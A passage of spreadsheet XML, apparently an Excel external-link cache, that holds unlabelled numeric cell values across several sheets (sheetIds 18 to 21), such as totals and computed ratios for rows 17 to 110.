            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.4787726838587</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.33</v>
          </cell>
          <cell r="R107">
            <v>168.63</v>
          </cell>
          <cell r="S107">
            <v>2654.06</v>
          </cell>
          <cell r="T107">
            <v>47.2083333333333</v>
          </cell>
          <cell r="U107">
            <v>46.8416666666667</v>
          </cell>
          <cell r="V107">
            <v>31.6864851957975</v>
          </cell>
          <cell r="W107">
            <v>118.270079435128</v>
          </cell>
          <cell r="X107">
            <v>125.813912115282</v>
          </cell>
          <cell r="Y107">
            <v>131.542617725297</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.67</v>
          </cell>
          <cell r="R108">
            <v>171.82</v>
          </cell>
          <cell r="S108">
            <v>2368.67</v>
          </cell>
          <cell r="T108">
            <v>48.625</v>
          </cell>
          <cell r="U108">
            <v>47.7277777777778</v>
          </cell>
          <cell r="V108">
            <v>28.2792502387774</v>
          </cell>
          <cell r="W108">
            <v>135.646958011997</v>
          </cell>
          <cell r="X108">
            <v>132.406006285648</v>
          </cell>
          <cell r="Y108">
            <v>127.78563497659</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.67</v>
          </cell>
          <cell r="R109">
            <v>101.5</v>
          </cell>
          <cell r="S109">
            <v>2897.09</v>
          </cell>
          <cell r="T109">
            <v>48.625</v>
          </cell>
          <cell r="U109">
            <v>28.1944444444444</v>
          </cell>
          <cell r="V109">
            <v>34.5879894937917</v>
          </cell>
          <cell r="W109">
            <v>296.915167095116</v>
          </cell>
          <cell r="X109">
            <v>275.684729064039</v>
          </cell>
          <cell r="Y109">
            <v>271.466195389167</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.67</v>
          </cell>
          <cell r="R110">
            <v>122.67</v>
          </cell>
          <cell r="S110">
            <v>2886.73</v>
          </cell>
          <cell r="T110">
            <v>48.625</v>
          </cell>
          <cell r="U110">
            <v>34.075</v>
          </cell>
          <cell r="V110">
            <v>34.4643027698185</v>
          </cell>
          <cell r="W110">
            <v>276.263924592973</v>
          </cell>
          <cell r="X110">
            <v>258.335371321431</v>
          </cell>
          <cell r="Y110">
            <v>268.404041943653</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="18">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7580.92</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>145337.782</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>8623</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8178.16</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>67410.53</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>352.5</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>11649.8</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>2726</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5103.54</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>35011.78</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>4567</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1455.66</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>12876.95</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1330</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1266.46</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>7872</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>366.34</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>342</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>990.786</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1220.92</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>60.14765625</v>
          </cell>
          <cell r="V101">
            <v>64.4557857142857</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.8714166666667</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>60.14765625</v>
          </cell>
          <cell r="V104">
            <v>64.1787738095238</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.3831190476191</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>10</v>
          </cell>
          <cell r="R107">
            <v>178.63</v>
          </cell>
          <cell r="S107">
            <v>2664.06</v>
          </cell>
          <cell r="T107">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U107">
            <v>46.5182291666667</v>
          </cell>
          <cell r="V107">
            <v>31.7149999999999</v>
          </cell>
          <cell r="W107">
            <v>133</v>
          </cell>
          <cell r="X107">
            <v>126.216201086044</v>
          </cell>
          <cell r="Y107">
            <v>131.548088256271</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>10</v>
          </cell>
          <cell r="R108">
            <v>181.82</v>
          </cell>
          <cell r="S108">
            <v>2378.67</v>
          </cell>
          <cell r="T108">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U108">
            <v>47.3489583333333</v>
          </cell>
          <cell r="V108">
            <v>28.3175</v>
          </cell>
          <cell r="W108">
            <v>119.7</v>
          </cell>
          <cell r="X108">
            <v>131.707182928171</v>
          </cell>
          <cell r="Y108">
            <v>127.751642724716</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>113.33</v>
          </cell>
          <cell r="S109">
            <v>2908.92</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>29.5130208333333</v>
          </cell>
          <cell r="V109">
            <v>34.6299999999999</v>
          </cell>
          <cell r="W109">
            <v>284.868977176669</v>
          </cell>
          <cell r="X109">
            <v>276.643430689138</v>
          </cell>
          <cell r="Y109">
            <v>271.520701841234</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>10.33</v>
          </cell>
          <cell r="R110">
            <v>133</v>
          </cell>
          <cell r="S110">
            <v>2897.06</v>
          </cell>
          <cell r="T110">
            <v>43.0416666666667</v>
          </cell>
          <cell r="U110">
            <v>34.6354166666667</v>
          </cell>
          <cell r="V110">
            <v>34.4888095238095</v>
          </cell>
          <cell r="W110">
            <v>263.891577928364</v>
          </cell>
          <cell r="X110">
            <v>258.766917293233</v>
          </cell>
          <cell r="Y110">
            <v>268.387951923675</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="19">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5652</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>139685.782</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>8248</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8367.26</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>67291.27</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>444.66</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>11205.14</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>2647</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4670.24</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>32988.54</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>3197</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1826</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>14247.95</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>2404</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1426.36</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>8849.64</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>361.5</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>368</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>984.286</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>0</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>56.6095588235294</v>
          </cell>
          <cell r="V101">
            <v>64.272150997151</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.7749169040836</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>56.6095588235294</v>
          </cell>
          <cell r="V104">
            <v>63.995928300095</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.2880104463438</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>9.83</v>
          </cell>
          <cell r="R107">
            <v>188.46</v>
          </cell>
          <cell r="S107">
            <v>2673.89</v>
          </cell>
          <cell r="T107">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U107">
            <v>46.1911764705882</v>
          </cell>
          <cell r="V107">
            <v>31.7413342830009</v>
          </cell>
          <cell r="W107">
            <v>125.025432349949</v>
          </cell>
          <cell r="X107">
            <v>126.154091053804</v>
          </cell>
          <cell r="Y107">
            <v>131.524109069558</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>9.83</v>
          </cell>
          <cell r="R108">
            <v>191.65</v>
          </cell>
          <cell r="S108">
            <v>2388.5</v>
          </cell>
          <cell r="T108">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U108">
            <v>46.9730392156863</v>
          </cell>
          <cell r="V108">
            <v>28.3535137701804</v>
          </cell>
          <cell r="W108">
            <v>135.198372329603</v>
          </cell>
          <cell r="X108">
            <v>131.886250978346</v>
          </cell>
          <cell r="Y108">
            <v>127.782290140256</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>125.16</v>
          </cell>
          <cell r="S109">
            <v>2920.74999999999</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>30.6764705882353</v>
          </cell>
          <cell r="V109">
            <v>34.6717711301044</v>
          </cell>
          <cell r="W109">
            <v>277.430262045647</v>
          </cell>
          <cell r="X109">
            <v>276.717801214446</v>
          </cell>
          <cell r="Y109">
            <v>271.54463750749</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>10</v>
          </cell>
          <cell r="R110">
            <v>143</v>
          </cell>
          <cell r="S110">
            <v>2907.06</v>
          </cell>
          <cell r="T110">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U110">
            <v>35.0490196078431</v>
          </cell>
          <cell r="V110">
            <v>34.5092592592592</v>
          </cell>
          <cell r="W110">
            <v>240.8</v>
          </cell>
          <cell r="X110">
            <v>257.510489510489</v>
          </cell>
          <cell r="Y110">
            <v>268.293052086989</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="20">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4789</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>134896.782</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>6344</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8634.58</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>65000.69</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>239.34</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>10965.8</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>3969</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4860.56</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>32096.98</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1478.38</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>12769.57</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>2375</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2056.3</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>9168.34</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>357.42</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>279</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1062.706</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>0</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>53.4645833333333</v>
          </cell>
          <cell r="V101">
            <v>64.0895596590909</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.6789654356061</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>53.4645833333333</v>
          </cell>
          <cell r="V104">
            <v>63.8141216856061</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.1934422348485</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>9.83</v>
          </cell>
          <cell r="R107">
            <v>198.29</v>
          </cell>
          <cell r="S107">
            <v>2683.72</v>
          </cell>
          <cell r="T107">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U107">
            <v>45.900462962963</v>
          </cell>
          <cell r="V107">
            <v>31.7675189393939</v>
          </cell>
          <cell r="W107">
            <v>134.791454730417</v>
          </cell>
          <cell r="X107">
            <v>126.582278481013</v>
          </cell>
          <cell r="Y107">
            <v>131.536076788935</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>9.83</v>
          </cell>
          <cell r="R108">
            <v>201.48</v>
          </cell>
          <cell r="S108">
            <v>2398.33</v>
          </cell>
          <cell r="T108">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U108">
            <v>46.6388888888889</v>
          </cell>
          <cell r="V108">
            <v>28.3893229166666</v>
          </cell>
          <cell r="W108">
            <v>143.54018311292</v>
          </cell>
          <cell r="X108">
            <v>132.454834226722</v>
          </cell>
          <cell r="Y108">
            <v>127.846876785096</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>136.99</v>
          </cell>
          <cell r="S109">
            <v>2932.57999999999</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>31.7106481481482</v>
          </cell>
          <cell r="V109">
            <v>34.7133049242424</v>
          </cell>
          <cell r="W109">
            <v>261.4539306847</v>
          </cell>
          <cell r="X109">
            <v>275.399664209066</v>
          </cell>
          <cell r="Y109">
            <v>271.503931691549</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>1.83</v>
          </cell>
          <cell r="R110">
            <v>144.83</v>
          </cell>
          <cell r="S110">
            <v>2908.89</v>
          </cell>
          <cell r="T110">
            <v>7.625</v>
          </cell>
          <cell r="U110">
            <v>33.525462962963</v>
          </cell>
          <cell r="V110">
            <v>34.4328835227272</v>
          </cell>
          <cell r="W110">
            <v>281.420765027322</v>
          </cell>
          <cell r="X110">
            <v>257.812607885107</v>
          </cell>
          <cell r="Y110">
            <v>268.301310809278</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="21">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6162</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>128734.782</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>8105</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8846.68</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>64259.01</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>711.3</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>10254.5</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>7925</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4825.16</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>35196.82</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>180</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1398.2</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>11551.37</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1912.02</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>7256.32</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>318.38</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>353</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1028.086</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>0</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>50.6506578947369</v>
          </cell>
          <cell r="V101">
            <v>63.9080028328612</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.5835576015109</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>50.6506578947369</v>
          </cell>
          <cell r="V104">
